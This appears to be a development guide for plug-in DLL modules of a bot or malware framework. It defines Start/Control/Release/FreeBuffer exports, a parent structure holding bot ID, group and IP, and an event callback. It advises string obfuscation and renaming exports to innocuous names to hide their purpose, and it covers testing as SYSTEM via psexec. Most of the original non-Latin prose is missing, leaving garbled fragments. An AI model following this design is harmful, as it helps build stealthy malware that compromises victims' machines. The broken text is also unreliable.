  

    DLL,       .
 64    64- ,   32   32- .
       ++.         ,    :
1.    Visual C++ Runtime.  malloc, memcpy, str* -  .  WinAPI       malloc  HeapAlloc,  memcpy  CopyMemory,  strstr  StrStr (shlwapi.h/.lib).
1.1. STL     .    std::mutex.  -     !
1.2.   STL     .  std::mutex   200.      ,   ,        !
1.3.   1  1.1      .
2.           ( /MT). 
3.    ,        malloc/realloc/free (        VirtualAlloc).            (     - dll-,      Windows).
4.         ,       (nt authority\SYSTEM),    ( ).   ,  Session 0 isolation/Services isolation in session 0.
5.          ,             .
   ,       .         ,      ,   production  .
,   ,   :
1.    .         .      .
2.        (..,       -  /  ,      ).
3.      ,      (       ):
a.  /  (ReadProcessMemory/WriteProcessMemory)
b. Named pipes


 
1.    Microsoft Visual Studio    2015.
2.  Visual Studio     :
*    :
-  : $(SolutionDir)Bin\$(PlatformTarget)\$(Configuration)\
-  : $(SolutionDir)\obj\$(Platform)\$(Configuration)\$(ProjectName)\
-  : 
*  Release:
-    (/++  ): 
-    (/): 
3.    Andrivet (, . _STR())
4.     GetApi.h.  ,     .
5.      - x32-  x64-.
6.         ,    .
7.     .      c:/temp/modulename.log (     ).
          .
8.       config.h ( ,   -     - , -   ).
9.        Windows.
      Windows - Windows XP (  - Windows Vista).
10.       notelemetry.obj (https://stackoverflow.com/questions/37761768/how-to-prevent-visual-studio-2015-update-2-to-add-telemetry-main-invoke-trigger)


 

     :

 modulename/Release_logged/x86
 modulename/Release_logged/x64
 modulename/Release_nologs/x86
 modulename/Release_nologs/x64

 Release_logged        (      Release!
..      ,    ).
 release_nologs -   ,   .
           ( cookies.22.04.2019).
        ,     ( cookies.22.04.2019.2)

      -       ,
     ,         .


 

     :
1.   Windows 7, 8.1, 10  32-,   64- .       ,   MSVC++ runtime library (..,          ).
2.     (,    )
3.    
4.    (  pstools,   : 
psexec d s runmodule.exe
      SYSTEM
        .


   

      .   ClientID,   group,  IP-     Start   ParentInfo
     Control (  ,        CtlArg).
         CtlArg  CtlArgLen.    .
  ,   -,       LoadLibrary.    :
main() {
  LoadLibrary(module.dll);
  Start = GetProcAddress(module, Start);
  Handle = Start();
  If(!handle) return 1;
  Control(config, config body);
  While(true) sleep(1000);
  Release(handle);
}
 ,  :
1. -     (DLL)    start  control     ,  ip-, clientid  group.
2.   ,    .

  :
*  Start()  ,      ,     (,   Start)
*    ,      Control()  ,     .
        -     .
*  Control()  ,     ,    (  ).
       .      ,      ,
       .

API 
   : Start, Control, Release, FreeBuffer [*1]
     stdcall    .
 Start   :
PVOID Start(
	LPCSTR ModuleName,	
	LPCBYTE Arg,
	SIZE_T ArgLen,
	LPSTR ResultInfo,
	const ParentInfo* pParentData,
	PVOID EventCallback,
	PVOID EventCallbackContext,
	PVOID Reserved1);
      .
ModuleName -  
Arg -   start
ArgLen -   CtlArg  
ResultInfo -    ctl.     1024 
pParentData -    ,   
EventCallback      (.)
EventCallbackContext    (.)
     ,       Control  Release (     Start       ).      .

// Parent-side descriptor handed to Start() through its pParentData argument.
// NOTE(review): the typedef declares no alias name, so the type is only
// reachable as `struct ParentInfo` (or `ParentInfo` in C++) — confirm the
// intended spelling against the callers.
typedef struct ParentInfo {
	CHAR ParentID[256];      // parent ID, fixed 256-byte buffer (assumed NUL-terminated; the declaration does not guarantee it — confirm)
	CHAR ParentGroup[64];    // parent group, fixed 64-byte buffer (same NUL-termination caveat)
	CHAR SelfIP[64];         // IP address as text, fixed 64-byte buffer (same caveat)
	LPCWSTR ParentFiles;     // wide-string pointer; its contents are not described in the visible text
} ;
ParentID -  ID   
ParentGroup -    
SelfIP -  IP- 
ParentFiles -  

6.2  Control   
BOOL Control (
	PVOID ModuleHandle,
	LPCSTR Ctl,	
	LPCBYTE CtlArg,
	SIZE_T CtlArgLen,
	LPSTR CtlResultInfo,
	PVOID* ppOutData,
	PDWORD pOutDataSize,
	LPCSTR pOutDataTag,	
	PVOID Reserved1);

ModuleHandle -  ,    Start.
Ctl -       
CtlArg -  ctl   ( )
CtlArgLen -   CtlArg  
ResultInfo -    ctl.     1024 
ppOutData -              ctl (ctl_OutData)
pOutDataSize -                ctl
pOutDataTag -    ,     .     128 
     TRUE,      FALSE.      *ppOutData     ,         FreeBuffer.
       .

 Release   
VOID Release (
	PVOID ModuleHandle);
     .            .

 FreeBuffer   
VOID FreeBuffer (
	PVOID pMemory);
      Control ( ppOutData).

*     
1)  ,  ,        
2)     4   ,      
CheckFuncStr=Start, GetLength=Control, SetHeigth=Release, Reload=FreeBuffer.
    ,         .
3)     ,   ,     : 1.Start, 2.Control, 3.FreeBuffer 4.Release
 def     
EXPORTS
@1		= Start_
@2		= Control_
@3		= FreeBuffer_
@4		= Release_
 def     :
CheckFuncStr		= Start_
GetLength		= Control_
Reload		= FreeBuffer_
SetHeigth		= Release_

    

    Start      .
EventCallback -    ,  :

// Signature of the host-supplied event callback (the EventCallback argument of
// Start); a module invokes it through a pointer of this type (see SendEvent below).
// Calling convention is __stdcall, the same convention stated for the module exports.
typedef VOID (__stdcall *pEventCallback)(
	PVOID ModuleHandle,     // module handle (the text ties it to the value returned by Start)
	LPCSTR EventName,       // event name
	LPCSTR EventInfo,       // event description / value string
	PVOID pOutData,         // optional extra payload; NULL when there is none
	DWORD OutDataSize,      // size of pOutData (0 when none; units not stated in the visible text — presumably bytes)
	LPCSTR pOutDataTag,     // tag string identifying the sender/data
	PVOID Context);         // the EventCallbackContext value that was passed to Start

:
	ModuleHandle -   (     Start)
	EventName -  
	EventInfo -  
	pOutData -   
	OutDataSize -  .
	pOutDataTag -  
	Context -   EventCallbackContext,   Start

      
// Forwards a name/value event to the host's EventCallback.
// Reads the globals EvCallback, EvCallbackContext and tag, which are defined
// outside this listing (presumably stored when Start received them — confirm).
// Does nothing when no callback was registered.
void SendEvent(char* name, char* value) {
	pEventCallback callback = (pEventCallback)EvCallback;   // NULL when the host supplied no callback
	if (callback) {
		debug_printf("SendEvent(%s, %s)\r\n", name, value);  // diagnostic trace only
		// The first argument fills the callback's ModuleHandle slot. NOTE(review): `Start`
		// here is presumably a global holding the handle returned to the host, not the
		// exported Start function of the same name — confirm; passing the function's
		// address as the handle would be a bug. pOutData/OutDataSize are fixed to
		// NULL/0 because this helper only carries a name/value pair.
		callback(Start, name, value, NULL, 0, tag, EvCallbackContext);
	}
}

tag   -   (    ;    .  , "module1")
name  -   (       -   ,   .  , "sql")
value -   ( .  , "module1 build 01 Jan, 20xx 11:22:25 started ok")

    .
    4 .  ,    DEBG  , VERS    , PING   heartbeat'  , .
,    ,    .  ,       ,    -     "file"  "net".
      , ..        ,    .      ,     .
 -   -    -       ,       (_stdcall).

!!!!!!!!!!!
!!!!!!
!!!!!!!!!!!

          .   .
..        ,     ,     .

    .

 ,       .      
  . ,     ,       .
    ,     -       .

   (    ),       
EventName = WantRelease
EventInfo = NULL
         .


 

1)   (),          Start.
  .
 :
- Start   , ,     
-        

2)   Start  botid, group  ip.
       Start,             .
